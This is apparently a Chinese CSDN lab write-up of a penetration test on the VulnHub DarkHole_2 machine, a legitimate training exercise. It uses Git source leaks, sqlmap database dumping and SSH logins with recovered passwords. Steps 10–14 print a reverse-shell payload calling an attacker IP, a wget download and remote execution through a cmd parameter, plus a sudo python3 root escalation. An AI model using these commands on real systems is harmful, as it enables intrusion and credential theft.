DarkHole_2靶场

该文章详细描述了一次针对Darkhole2靶机的渗透测试过程,包括网络配置、信息收集、端口扫描、发现Git泄露、利用SQL注入获取数据库信息、SSH登录、寻找flag、反弹shell以及最终的权限提升至rootshell。
摘要由CSDN通过智能技术生成

一、靶场介绍

1.下载地址:https://www.vulnhub.com/entry/darkhole-2,740/
2.将靶机网络适配器改为NAT模式
在这里插入图片描述
3.启动靶机

二、信息收集

1.主机发现

nmap -sn 192.168.111.1/24

在这里插入图片描述

2.端口扫描

nmap -p 1-65535 -A 192.168.111.132

在这里插入图片描述

3.访问网页,发现有login界面,但没有用户名密码

在这里插入图片描述

4.扫描发现存在.git泄露,浏览器访问

在这里插入图片描述

三、渗透流程

1.下载git泄露源码
在这里插入图片描述
2.发现了mysql连接的用户名,但没有密码
在这里插入图片描述
3.查看日志,发现更新了login.php的版本
在这里插入图片描述
4.查看两个版本的区别,发现删除了一个用户,用户名为:lush@admin.com;密码为:321
在这里插入图片描述

5.使用lush@admin.com用户登录,判断其可能存在sql注入
在这里插入图片描述
6.尝试使用sqlmap爆破数据库

sqlmap -r sql.txt -D darkhole_2 --dump-all --batch

在这里插入图片描述
7.尝试ssh账号登录,账号:jehad密码:fool

ssh jehad@192.168.111.132

在这里插入图片描述
8.找寻目录,发现flag
在这里插入图片描述
9.查询计划任务

cat /etc/crontab

在这里插入图片描述
在/opt/web目录下发现index.php
在这里插入图片描述
查看历史命令执行
在这里插入图片描述
10.使用kali生成反弹shell,并开启http服务

echo 'mknod a p; telnet 192.168.111.129 6666 0<a /bin/bash 1>a' > exp
python3 -m http.server 8080

在这里插入图片描述
11.靶机下载shell

wget 192.168.111.129:8080/exp

在这里插入图片描述
12.kali开启监听,靶机将exp移动到/tmp目录下执行

nc -lvvp 6666
mv exp /tmp/exp
curl "http://localhost:9999/?cmd=bash%20/tmp/exp"

在这里插入图片描述
在这里插入图片描述
13.进入终端shell
在这里插入图片描述
查看历史命令,发现其密码为:gang

cat .bash_history

在这里插入图片描述
14.sudo执行python3切换到root shell,提权成功

sudo python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

在这里插入图片描述

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值